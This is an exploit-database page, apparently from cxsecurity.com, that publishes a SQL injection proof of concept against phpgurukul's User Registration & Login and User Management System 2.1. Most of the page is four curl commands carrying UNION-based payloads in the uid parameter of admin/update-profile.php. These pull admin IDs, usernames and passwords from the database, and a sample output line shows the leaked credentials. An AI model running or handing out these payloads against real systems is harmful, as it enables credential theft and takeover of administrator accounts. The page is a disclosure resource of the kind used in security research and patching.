User Registration & Login and User Management System 2.1 SQL Injection

2020.10.30
Credit: Ihsan Sencan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection # Dork: N/A # Date: 2020-10-22 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: 2.1 # Tested on: Linux # CVE: N/A # POC: # 1) # curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7-- -" | grep fname curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),4,5,6,7-- -" | grep lname curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),5,6,7-- -" | grep email curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,4,5,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),7-- -" | grep contact # # <input type="text" class="form-control" name="fname" value="[ID: 1 ] [ Username: xxx ] [ Password: xxx]" > #


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top